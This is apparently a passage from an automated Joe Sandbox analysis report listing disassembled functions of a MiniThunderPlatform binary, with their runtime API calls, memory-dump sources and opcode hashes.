                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$??$?CriticalD@1@@std@@D@2@@0@0@SectionV?$basic_string@$EnterEventLeaveReset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2077395254-0
                                                                                                                                              • Opcode ID: f29f686fe78848768d5015874fa9af833909604ed0d01739ecdc55a36e83c1e9
                                                                                                                                              • Instruction ID: 9cbbf9471dc56a08da19e422d0ed4456b5fa6fd65d644a25b51ea3b1e41d7eb3
                                                                                                                                              • Opcode Fuzzy Hash: f29f686fe78848768d5015874fa9af833909604ed0d01739ecdc55a36e83c1e9
                                                                                                                                              • Instruction Fuzzy Hash: B0216875604B12DFC714DF14C888A9ABBF4FB8A750F404A1DF84693751CB34AD49CBA6
                                                                                                                                              Function 100A14C0 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??_V@YAXPAX@Z.MSVCR71(?), ref: 100A155C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A158F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A15A0
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,100A2CE8), ref: 100A15B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2599707790-0
                                                                                                                                              • Opcode ID: 52a54b6c4c9743e556c58605ae251653cbe46a2c0e14fad7bf278133a74d91c1
                                                                                                                                              • Instruction ID: a989fec3441305bc9271369086430d7de5ad099a8497913ae6997c91565977cb
                                                                                                                                              • Opcode Fuzzy Hash: 52a54b6c4c9743e556c58605ae251653cbe46a2c0e14fad7bf278133a74d91c1
                                                                                                                                              • Instruction Fuzzy Hash: 4A313078104742CFD315DF64C49979ABBE4EF69740F50494DE4AB47292CBB4624CCBA2
                                                                                                                                              Function 100815B0 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,10248B71,000000FF), ref: 10081600
                                                                                                                                              • RtlDeleteCriticalSection.NTDLL ref: 1008161C
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,?,?,?,?,10248B71,000000FF), ref: 1008162A
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000002,?,?,?,?,?,?,?,?,?,?,?,?,10248B71,000000FF), ref: 10081643
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CriticalDeleteSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1297904149-0
                                                                                                                                              • Opcode ID: de2db9b62f09b8fe944887cb80a0589e1152f1c41724c2eee90d4a29c34b5ff6
                                                                                                                                              • Instruction ID: 4464ff57c600054512124e4350c733eb5f42ccc5c0e714c904396e8957eb5340
                                                                                                                                              • Opcode Fuzzy Hash: de2db9b62f09b8fe944887cb80a0589e1152f1c41724c2eee90d4a29c34b5ff6
                                                                                                                                              • Instruction Fuzzy Hash: ED21F7B5900B409FC720CF1AC885916F7E9FF98620B944A1EE48BC3B21D775F944CB55
                                                                                                                                              Function 100110D2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000208,?), ref: 100110F7
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,?), ref: 10011101
                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 10011114
                                                                                                                                              • wcscpy.MSVCR71(?,?,?,?,?), ref: 10011164
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Module$FileHandleNamememsetwcscpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2319185427-0
                                                                                                                                              • Opcode ID: 8fa056f8419d3690100d3a274f9646c6a9d4fdcb65968857e21b2f4e6cd4aa74
                                                                                                                                              • Instruction ID: 4bfeaa10847397da0db312e6272dc4fe9e7bc6591dcdc5b5054b5c20de6411c6
                                                                                                                                              • Opcode Fuzzy Hash: 8fa056f8419d3690100d3a274f9646c6a9d4fdcb65968857e21b2f4e6cd4aa74
                                                                                                                                              • Instruction Fuzzy Hash: C1114071510216BBCF18DB64DC8DBDE779AEF04361F504255E615CB081EB31D9C48753
                                                                                                                                              Function 100C13E0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,1024F13D,000000FF), ref: 100C1449
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C147D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C148B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,1024F13D,000000FF), ref: 100C1499
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1952106264-0
                                                                                                                                              • Opcode ID: a11c8be605d6fc59edbde6f2d6ad3a2fd7b034f7b6d8a1ebcd6f080bb96ac9de
                                                                                                                                              • Instruction ID: 8d9275c501ea7e3ad614ca44f6628887477e8c808280f35f7b647138e531a6ad
                                                                                                                                              • Opcode Fuzzy Hash: a11c8be605d6fc59edbde6f2d6ad3a2fd7b034f7b6d8a1ebcd6f080bb96ac9de
                                                                                                                                              • Instruction Fuzzy Hash: 84215E78204751CFE314CF24C548B6AB7E5EF99714F00455CE4AA87391CBB4A949CBA2
                                                                                                                                              Function 10011185 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCR71(?,00000000,00000104,00000000,102768F0,00000104), ref: 100111C2
                                                                                                                                              • wcslen.MSVCR71(?,?,00000104,00000000,00000000,00000000,102768F0,00000104), ref: 100111D2
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 100111DD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 100111F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@ByteCharD@2@@std@@D@std@@MultiU?$char_traits@V?$allocator@Widememsetwcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2795602572-0
                                                                                                                                              • Opcode ID: c96f9be5b1928c462a8dd6e667d2586d0b651861ae43c9b748d5008f679f0b4d
                                                                                                                                              • Instruction ID: d95eab8dd1d650a8c93b4c1834886f1441db20d96a07a4b2498c1ea41a73b835
                                                                                                                                              • Opcode Fuzzy Hash: c96f9be5b1928c462a8dd6e667d2586d0b651861ae43c9b748d5008f679f0b4d
                                                                                                                                              • Instruction Fuzzy Hash: 1E01C972900158AFEB34DB65DC88EEFBBBCFB89614F10451AE919D7102EA315548CF61
                                                                                                                                              Function 1004431C Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10044321
                                                                                                                                                • Part of subcall function 1004C3E0: RtlInitializeCriticalSection.NTDLL(?), ref: 1004C426
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004437A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004438A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,102426A0,000000FF), ref: 1004439A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??0?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CriticalH_prologInitializeSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3126932660-0
                                                                                                                                              • Opcode ID: 50aba508a046152935bc03cc40fd906ed327957df90a526f66e04ec768006195
                                                                                                                                              • Instruction ID: 90dcc276283c8318ea8bff43cb9da49985b6971edf90a71af3312369715575f5
                                                                                                                                              • Opcode Fuzzy Hash: 50aba508a046152935bc03cc40fd906ed327957df90a526f66e04ec768006195
                                                                                                                                              • Instruction Fuzzy Hash: 272117B5800B94DFD720DF6AC58469AFBF8FFA5640F50894EE49B93760CBB06604CB61
                                                                                                                                              Function 10040350 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,1024359F,000000FF,1003F6BB,?,?,00000000,102433B8,000000FF,1002F2F1,?,?), ref: 1004038D
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,00000000,1024359F,000000FF,1003F6BB,?,?,00000000,102433B8,000000FF,1002F2F1,?,?,?), ref: 100403C5
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100403D3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100403E0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$CloseHandle
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2484158455-0
                                                                                                                                              • Opcode ID: 551359d0f0d651c2a28da3de8c132a439614fa1a2ffbacebaebcd6dffafcd22e
                                                                                                                                              • Instruction ID: 3d84c7f3018dc927dad012c120a3deec7d208fa4e43e506e8374ffced61b3c5a
                                                                                                                                              • Opcode Fuzzy Hash: 551359d0f0d651c2a28da3de8c132a439614fa1a2ffbacebaebcd6dffafcd22e
                                                                                                                                              • Instruction Fuzzy Hash: 50116075104B619FC360CF19C98861BBBE4FB58B11FA0492DF49BD3691C774A948CB92
                                                                                                                                              Function 1002424E Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 10024253
                                                                                                                                                • Part of subcall function 10023F17: RtlEnterCriticalSection.NTDLL(?), ref: 10023F26
                                                                                                                                                • Part of subcall function 1002B40C: __EH_prolog.LIBCMT ref: 1002B411
                                                                                                                                                • Part of subcall function 1002B40C: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?), ref: 1002B427
                                                                                                                                                • Part of subcall function 1002B40C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(000000A1), ref: 1002B445
                                                                                                                                                • Part of subcall function 1002B0FA: __EH_prolog.LIBCMT ref: 1002B0FF
                                                                                                                                                • Part of subcall function 1002B0FA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,100240E7,name), ref: 1002B12C
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,?), ref: 100242A0
                                                                                                                                              • ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,7C3F18B8), ref: 100242B0
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 100242BD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$H_prolog$??0?$basic_string@CriticalSectionV12@$??1?$basic_string@?assign@?$basic_string@?erase@?$basic_string@EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1821285802-0
                                                                                                                                              • Opcode ID: c0292ec114bab0fcc6570d78d527002d63198fbf81e2daa71ad448824cf69905
                                                                                                                                              • Instruction ID: b9d7309c63981c566af2b8b7150d4c5d2119598a6eb100c2f8a44c3f1610df0b
                                                                                                                                              • Opcode Fuzzy Hash: c0292ec114bab0fcc6570d78d527002d63198fbf81e2daa71ad448824cf69905
                                                                                                                                              • Instruction Fuzzy Hash: 6201F531600615EFCB15CF65EC889AE37B0FF98700B81461AF856D7221CF35E958DB50
                                                                                                                                              Function 1005C290 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71 ref: 1005C2D3
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1005C2E6
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C2FD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1005C30C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V01@@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4131879318-0
                                                                                                                                              • Opcode ID: 34d34e082f0740206269c6dbd7663d29087d53eec992afa7c4754c9c0b5db4ec
                                                                                                                                              • Instruction ID: d862ce3b858816d1943db1379c78a29cea9f9849f7a36117bdcb00c780569ee8
                                                                                                                                              • Opcode Fuzzy Hash: 34d34e082f0740206269c6dbd7663d29087d53eec992afa7c4754c9c0b5db4ec
                                                                                                                                              • Instruction Fuzzy Hash: 051135741083A19FC714CF28C99875ABBE4FB98B14F408A5DF49A83381DB389508CF93
                                                                                                                                              Function 1013C2B0 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlEnterCriticalSection.NTDLL(10304E14), ref: 1013C2BB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,1013C4AB), ref: 1013C2EA
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(00000000,?,?,1013C4AB), ref: 1013C30B
                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(10304E14), ref: 1013C31C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@CriticalSection$EnterLeave
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2389133793-0
                                                                                                                                              • Opcode ID: ccc4669b5c08017eeca1b47ec207602f9061e296c79a88c9e7a5c60b721e39b8
                                                                                                                                              • Instruction ID: 79ff4fee841c6d3740902e9dd3d5f801ed24b48e181cba14c7484725b2d23c3d
                                                                                                                                              • Opcode Fuzzy Hash: ccc4669b5c08017eeca1b47ec207602f9061e296c79a88c9e7a5c60b721e39b8
                                                                                                                                              • Instruction Fuzzy Hash: 9A0108B86017019FC714DF18C884846BBE1FF8D324B65CAADE85A8B362D732ED41CB91
                                                                                                                                              Function 100C4211 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 100C4216
                                                                                                                                                • Part of subcall function 100BCEA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000,1024EB20,000000FF,1008A9DD,?,?,10073FBC), ref: 100BCED2
                                                                                                                                                • Part of subcall function 100BCEA0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,?,00000000,1024EB20,000000FF,1008A9DD), ref: 100BCEE0
                                                                                                                                                • Part of subcall function 100BCEA0: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(102768F0,?,00000000,?,00000000,1024EB20,000000FF,1008A9DD), ref: 100BCEF7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,1008F05B), ref: 100C4248
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1008F05B), ref: 100C4258
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,1008F05B), ref: 100C4268
                                                                                                                                                • Part of subcall function 100C402E: __EH_prolog.LIBCMT ref: 100C4033
                                                                                                                                                • Part of subcall function 100C402E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(cmd_report_change_ex,?), ref: 100C404D
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(Can't get setting instance!), ref: 100C406D
                                                                                                                                                • Part of subcall function 100C402E: _CxxThrowException.MSVCR71(-00000018,102CA7C4,-00000050), ref: 100C408B
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(max_url_length), ref: 100C4095
                                                                                                                                                • Part of subcall function 100C402E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(hub_agent), ref: 100C40AA
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(-00000034,-00000050,000000FF), ref: 100C40D5
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C40E2
                                                                                                                                                • Part of subcall function 100C402E: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,-0000006C), ref: 100C4110
                                                                                                                                                • Part of subcall function 100C402E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C411D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
